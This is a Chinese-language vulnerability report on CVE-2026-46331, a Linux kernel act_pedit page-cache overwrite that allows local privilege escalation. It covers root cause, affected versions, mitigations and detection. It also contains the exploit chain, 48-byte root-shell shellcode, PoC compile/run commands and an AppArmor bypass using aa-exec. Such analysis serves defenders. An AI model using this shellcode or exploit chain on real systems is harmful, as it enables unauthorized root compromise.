当前位置:首页>Linux>CVE-2026-46331 Linux提权漏洞分析报告

CVE-2026-46331 Linux提权漏洞分析报告

  • 2026-07-02 21:31:00
CVE-2026-46331 Linux提权漏洞分析报告

CVE-2026-46331 漏洞分析报告

分析时间: 2026-06-29漏洞昵称: pedit COW影响产品: Linux Kernel (net/sched 子系统)


漏洞复现

星球已编译非交互式WebShell版

一、漏洞概述

CVE-2026-46331 - Linux Kernel net/sched act_pedit 局部 COW 页面缓存污染导致本地提权

CVE-2026-46331 是 Linux 内核 net/sched 流量控制子系统中 act_pedit(数据包编辑动作)的一个严重安全漏洞。该漏洞源于内核在修改数据包头部之前计算可写 Copy-on-Write (COW) 范围时存在缺陷——它在遍历编辑键(keys)之前仅计算一次 COW 范围,使用的预计算提示值 tcfp_off_max_hint 未能考虑类型化键(typed keys)在运行时添加的头部偏移量。这导致部分写入区域未被正确 COW 化,内核最终写入了共享的页面缓存页面而非私有副本,从而造成页面缓存污染。

攻击者可以利用此漏洞,通过污染 setuid-root 二进制文件(如 /bin/su)在页面缓存中的 ELF 镜像,注入 shellcode 并执行,最终实现从普通本地用户到 root 的权限提升

该漏洞与 Dirty Pipe (CVE-2022-0847)、Copy Fail (CVE-2026-31431)、DirtyClone 和 Dirty Frag 属于同一类漏洞家族——都是内核快速路径写入了它不独占拥有的页面。


二、漏洞详细信息

字段
CVE 编号
CVE-2026-46331
漏洞类型
越界写入 (Out-of-Bounds Write) → 页面缓存污染 → 本地权限提升 (LPE)
漏洞发布日期
2026-06-16 (NVD 首次发布)
POC/EXP 发布日期
2026-06-17 (CVE 分配后一天)
受影响组件
Linux Kernel net/sched/act_pedit.c
受影响函数tcf_pedit_act()
引入版本
Linux Kernel v5.18 (commit 8b796475fd78)
修复版本
Linux Kernel v7.1-rc7 及稳定分支回补
严重程度CVSS v3.1: 7.8 (HIGH)
CVSS 向量CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Red Hat 评级
Important
攻击向量
本地 (Local)
所需权限
普通用户 + 可通过非特权用户命名空间获取 namespace-local CAP_NET_ADMIN
用户交互
不需要

三、受影响版本

受影响的内核版本范围

内核分支
受影响版本
修复版本
4.19.x
4.19.0 ~ 4.19.243
4.19.244+
5.4.x
5.4.0 ~ 5.4.194
5.4.195+
5.10.x
5.10.0 ~ 5.10.116
5.10.117+
5.15.x
5.15.0 ~ 5.15.40
5.15.41+
5.17.x
5.17.0 ~ 5.17.8
5.17.9+
5.18+
v5.18 ~ v7.1-rc6
v7.1-rc7+

已确认受影响的发行版

发行版
内核版本
可利用性
修复状态
RHEL 10.0
6.12.0-228.el10
✅ 可直接利用 (ROOT)
✅ 已修复 (RHSA-2026:27288)
RHEL 9
-
✅ 受影响
✅ 已修复 (RHSA-2026:27789)
RHEL 8
-
✅ 受影响
✅ 已修复 (RHSA-2026:27353)
AlmaLinux 8
-
✅ 受影响
✅ 已修复 (ALSA-2026:27353)
Debian 13 (trixie)
6.12.90+deb13.1
✅ 可直接利用 (ROOT)
✅ 已修复 (DSA-6355-1)
Debian 11
-
✅ 受影响
❌ 尚未修复
Debian 12
-
✅ 受影响
❌ 尚未修复
Ubuntu 24.04.4
6.17.0-22
✅ 需 --ubuntu 标志绕过 AppArmor
❌ 尚未修复
Ubuntu 18.04 ~ 26.04
-
✅ 受影响
❌ 尚未修复
Ubuntu 26.04
7.0.0-14
❌ AppArmor 阻止 PoC (内核仍脆弱)
❌ 尚未修复
RHEL 7 / CentOS 7
-
❌ 不受影响
N/A

利用前提条件

  1. act_pedit 模块可加载 — 当配置 pedit tc 动作时会自动加载
  2. 非特权用户命名空间已启用 — 攻击者通过 unshare(CLONE_NEWUSER | CLONE_NEWNET) 获取 namespace-local 的 CAP_NET_ADMIN
  3. 本地代码执行能力 — 攻击者需要在目标系统上以普通用户身份执行代码

四、漏洞根因分析

技术细节

漏洞位于 net/sched/act_pedit.c 中的 tcf_pedit_act() 函数。

问题流程:

tcf_pedit_act()    │    ├── 使用 tcfp_off_max_hint 计算 COW 范围 (仅一次,在键循环之前)    │       │    │       └── skb_ensure_writable() ← 基于预计算提示值    │    ├── 遍历编辑键 (per-key loop)    │       │    │       └── 类型化键在运行时解析偏移量 (L2/L3/L4 头部)    │               │    │               └── 实际写入偏移量 > COW 范围    │    └── 写入未 COW 化的区域 → 共享页面缓存被污染

核心问题:

  • tcf_pedit_act() 在键循环之前使用 tcfp_off_max_hint 一次性计算 skb_ensure_writable() 的 COW 范围
  • 该提示值未考虑类型化键(typed keys)在运行时添加的头部偏移量
  • 类型化键的偏移量在执行时针对 L2/L3/L4 头部解析,真实写入偏移量仅在循环运行时才知道
  • 部分目标区域因此从未被私有化(partial COW)
  • 写入未 COW 化区域构成越界、跨页写入
  • 由于 skb 可以引用通过 sendfile 拉入的零拷贝页面,该越界写入可落入支持磁盘文件的共享页面缓存内存中

五、POC/EXP 利用分析

公开 PoC 信息

项目
详情
PoC 作者
Massimiliano Oldani (sgkdev)
PoC 仓库
https://github.com/sgkdev/packet_edit_meme
PoC 发布日期
2026-06-17
Stars / Forks
96 ⭐ / 31 🍴
语言
C (96.8%) + Makefile (3.2%)
PoC 状态
✅ 公开可用,已验证可在多个发行版上实现 unprivileged → root

第二个 PoC 仓库

项目
详情
仓库
https://github.com/0xBlackash/CVE-2026-46331
Stars / Forks
10 ⭐ / 3 🍴
语言
C (100%)

利用链 (Exploit Chain)

PoC 不需要堆整形(heap shaping)或竞争窗口(race window),链接了四个普通组件:

  1. 命名空间与能力获取

    • 从非特权用户命名空间中,攻击者获取 namespace-local 的 CAP_NET_ADMIN
    • 通过 unshare(CLONE_NEWUSER | CLONE_NEWNET) 实现
  2. 流量控制绑定

    • 配置 pedit 动作,使用类型化键,其运行时偏移量落在 tcf_pedit_act() 使其可写的范围之外
    • 触发 partial-COW 写入
  3. 页面缓存定位

    • 通过向网络栈注入零拷贝文件引用,将越界写入定向到 setuid-root /bin/su 的缓存 ELF 镜像
  4. Payload 注入

    • 用等效于 setgid(0) + setuid(0) + execve("/bin/sh") 的 shellcode 覆盖缓存的入口点
  5. 获取 Root

    • 离开命名空间并运行 su
    • 共享页面缓存提供被污染的镜像,shellcode 以 root 身份运行

关键 Shellcode (x86_64)

/* x86_64: setgid(0); setuid(0); execve("/bin/sh", {"/bin/sh", NULL}, NULL).   48 bytes, 纯系统调用,syscall ABI 冻结,可在任何 5.x/6.x/7.x 内核上运行 */staticconstunsignedchar SHELLCODE[] = {0x310xff,                          // xor edi, edi0xb80x6a0x000x000x00,        // mov eax, 106 (setgid)0x0f0x05,                          // syscall0xb80x690x000x000x00,        // mov eax, 105 (setuid)0x0f0x05,                          // syscall (rdi still 0)0x480x310xd2,                    // xor rdx, rdx0x480xbb0x2f0x620x690x6e0x2f0x730x680x00,  // movabs rbx, "/bin/sh"0x53,                                // push rbx0x480x890xe7,                    // mov rdi, rsp0x52,                                // push rdx (argv NULL)0x57,                                // push rdi ("/bin/sh")0x480x890xe6,                    // mov rsi, rsp (argv)0xb80x3b0x000x000x00,        // mov eax, 59 (execve)0x0f0x05,                          // syscall0x900x900x90,                    // NOP padding};

PoC 编译与运行

# 编译x86_64-linux-gnu-gcc -O2 -Wall -static packet_edit_meme.c pedit_primitive.c -o packet_edit_meme# 在 RHEL/Debian 上运行 (非特权用户命名空间默认开放)./packet_edit_meme# 在 AppArmor 限制的 Ubuntu 上运行 (需要 aa-exec 绕过)./packet_edit_meme --ubuntu

已验证目标

发行版
内核
标志
结果
RHEL 10.0
6.12.0-228.el10
(无)
✅ ROOT
Debian 13 trixie
6.12.90+deb13.1
(无)
✅ ROOT
Ubuntu 24.04.4
6.17.0-22
--ubuntu
✅ ROOT
Ubuntu 26.04
7.0.0-14-generic
--ubuntu
❌ FAIL (AppArmor 阻止)

pedit_primitive.c 核心利用原语

/* * pedit_primitive.c -- CVE-2026-46331 页面缓存覆盖原语 * * 在 lo 上的 egress tc-pedit 动作,其第一个 (NETWORK) 键膨胀 IP 头部长度, * 使后续 TCP 键写入超出动作的单一、陈旧 COW 范围——进入 sendfile 放入 egress skb 的页面缓存页面。 */// 核心 API: 通过页面缓存原语向文件描述符写入数据intapi_fd_write(int fd, off_t offset, constvoid *src, size_t size);// 设置函数: 初始化 netlink socket、loopback 接口、监听 socketintsetup(void);

Ubuntu AppArmor 绕过机制

Ubuntu 通过两个 sysctl 拒绝无限制的非特权用户命名空间:

  • kernel.apparmor_restrict_unprivileged_userns — 拒绝无限制 userns 创建
  • kernel.apparmor_restrict_unprivileged_unconfined — 强制无限制 change_profile 到 STACK

--ubuntu 标志通过 aa-exec -p {trinity,chrome,flatpak} 重新执行(这些配置文件携带 userns, 规则):

  • 24.04.4: userns=1, unconfined=0 → aa-exec 绕过 有效
  • 26.04: userns=1, unconfined=1 → aa-exec 绕过 已关闭

六、修复方案

上游内核修复

修复补丁主题: "net/sched: act_pedit: extend the writable skb range per key"

修复内容:

  1. 将 skb_ensure_writable() 移入每个键的循环内部,此时实际写入偏移量已知
  2. 对偏移量算术添加溢出检查
  3. 对 offset_valid() 添加 INT_MIN 防护(取反未定义)
  4. 对于负偏移量(如入口处的以太网头部编辑),使用 skb_cow() 来 COW headroom
  5. 提前线性化携带共享 frags 的 skbs,使零拷贝页面不会被静默污染

修复 Commit

分支
Commit Hash
稳定分支 1
899ee91156e57784090c5565e4f31bd7dbffbc5a
稳定分支 2
2bec122b9fb91507a758ab5e3e5c4fbe7cb3f61b
稳定分支 3
3dee9d0c198faeb95d052c1b94c2958751a28512
稳定分支 4
b198ed4e52580a7238c7c7082f03906f8b310313

厂商修复状态

厂商
公告编号
状态
Red Hat RHEL 10
RHSA-2026:27288
✅ 已发布
Red Hat RHEL 9
RHSA-2026:27789
✅ 已发布
Red Hat RHEL 8
RHSA-2026:27353
✅ 已发布
Red Hat RHEL 8.8 EUS/TUS
RHSA-2026:27355
✅ 已发布
AlmaLinux 8
ALSA-2026:27353
✅ 已发布
Debian 13 (trixie)
DSA-6355-1
✅ 已发布 (2026-06-21)
Ubuntu
-
❌ 截至 2026-06-25 仍标记为脆弱

七、缓解措施

1. 安装补丁内核并重启(首选)

# RHEL/AlmaLinuxsudo yum update kernelsudo reboot# Debiansudo apt update && sudo apt upgradesudo reboot

2. 阻止 act_pedit 模块加载(如果不使用 tc pedit 规则)

# 检查模块是否已加载lsmod | grep -w act_pedit# 检查是否正在使用 pedit 规则tc actions list action pedit# 阻止加载 (更可靠的 install 覆盖方式)echo'install act_pedit /bin/true' | sudo tee /etc/modprobe.d/disable-act_pedit.conf# 如果已加载且无活动规则依赖,卸载它lsmod | grep -w act_pedit && sudo rmmod act_pedit# 恢复: 删除配置文件sudo rm /etc/modprobe.d/disable-act_pedit.conf

3. 限制非特权用户命名空间

# EL 系列 (RHEL/CentOS/AlmaLinux)sudo sysctl -w user.max_user_namespaces=0echo'user.max_user_namespaces = 0' | sudo tee /etc/sysctl.d/99-pedit-cow.conf# Debian / Ubuntusudo sysctl -w kernel.unprivileged_userns_clone=0echo'kernel.unprivileged_userns_clone = 0' | sudo tee /etc/sysctl.d/99-pedit-cow.conf

注意: 非特权用户命名空间是 rootless 容器运行时、CI 沙箱、Flatpak 等所必需的。禁用会影响这些功能。

4. 检测与狩猎

# 审计 tc 执行和模块加载auditctl -w /sbin/tc -p x -k tc_execauditctl -w /usr/sbin/tc -p x -k tc_execgrep act_pedit /proc/modules# 如果怀疑被利用,清除页面缓存sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'

八、参考信息

类型
链接
NVD
https://nvd.nist.gov/vuln/detail/CVE-2026-46331
CVE.org
https://www.cve.org/CVERecord?id=CVE-2026-46331
GitHub Advisory
GHSA-cr2w-747q-47qc
Red Hat RHSB-2026-008
https://access.redhat.com/security/vulnerabilities/RHSB-2026-008
Red Hat CVE 页面
https://access.redhat.com/security/cve/cve-2026-46331
Debian Security Tracker
https://security-tracker.debian.org/tracker/CVE-2026-46331
Ubuntu Security
https://ubuntu.com/security/CVE-2026-46331
Amazon Linux
https://explore.alas.aws.amazon.com/CVE-2026-46331.html
CloudLinux 博客
https://blog.cloudlinux.com/pedit-cow-mitigation-and-kernel-update
TuxCare 深度分析
https://tuxcare.com/blog/pedit-cow-cve/
The Hacker News
https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html
PoC (sgkdev)
https://github.com/sgkdev/packet_edit_meme
PoC (0xBlackash)
https://github.com/0xBlackash/CVE-2026-46331
netdev 邮件列表
https://lists.openwall.net/netdev/2026/05/23/133
修复 Commit 1
https://git.kernel.org/stable/c/899ee91156e57784090c5565e4f31bd7dbffbc5a
修复 Commit 2
https://git.kernel.org/stable/c/2bec122b9fb91507a758ab5e3e5c4fbe7cb3f61b
修复 Commit 3
https://git.kernel.org/stable/c/3dee9d0c198faeb95d052c1b94c2958751a28512
修复 Commit 4
https://git.kernel.org/stable/c/b198ed4e52580a7238c7c7082f03906f8b310313
OpenCVE
https://app.opencve.io/cve/CVE-2026-46331
Strobes VI
https://vi.strobes.co/cve/CVE-2026-46331
Penligent 分析
https://www.penligent.ai/hackinglabs/cve-2026-46331/
TLCTC 分析
https://www.tlctc.net/cve-2026-46331-tlctc.html
Windows Forum
https://windowsforum.com/threads/cve-2026-46331-linux-pedit-net-sched-bug-fix-prevents-page-cache-corruption.428355/
Reddit 讨论
https://www.reddit.com/r/cybersecurity/comments/1ugckz5/peditcow_cve202646331_another_pagecache_write_in/

九、时间线

日期
事件
2026-05-23
修复补丁在 netdev 邮件列表上作为常规数据损坏补丁发布,无 CVE、无安全警告
2026-06-16
修复合并,kernel.org CNA 分配 CVE-2026-46331,NVD 首次发布
2026-06-17
公开武器化 PoC 由 sgkdev 发布到 GitHub
2026-06-17
CloudLinux 发布缓解措施博客
2026-06-19
NVD 添加更多修复 commit 引用
2026-06-21
Debian 发布 DSA-6355-1 安全更新
2026-06-22
AlmaLinux 发布 ALSA-2026:27353
2026-06-23
Red Hat 发布 RHEL 8/9/10 安全更新
2026-06-25
The Hacker News 发布详细报道
2026-06-26
TuxCare 发布深度技术分析
2026-06-28
NVD 添加 CVSS v3.1 评分 (7.8 HIGH)

十、优先级修复清单

  1. 立即修补 — 在 RHEL 8/9/10、AlmaLinux 8、Debian 13 上部署厂商修复内核并重启
  2. 无法修补时缓解 — 如果不使用 tc pedit 规则则阻止 act_pedit,或限制非特权用户命名空间
  3. 审计本地访问 — 审查共享主机、CI/CD 运行器、构建服务器上的 shell 访问权限
  4. 狩猎检测 — 从 5 月下旬邮件列表发布开始,对暴露窗口运行检测启发式分析
  5. 修补后重启 — 清除可能被污染的缓存页面以及旧内核

报告生成时间: 2026-06-29 08:12:15

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 01:03:43 HTTP/2.0 GET : https://f.mffb.com.cn/a/502498.html
  2. 运行时间 : 0.190865s [ 吞吐率:5.24req/s ] 内存消耗:4,411.04kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=9d41d780b2b6146b1c1dedc70d93fec3
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
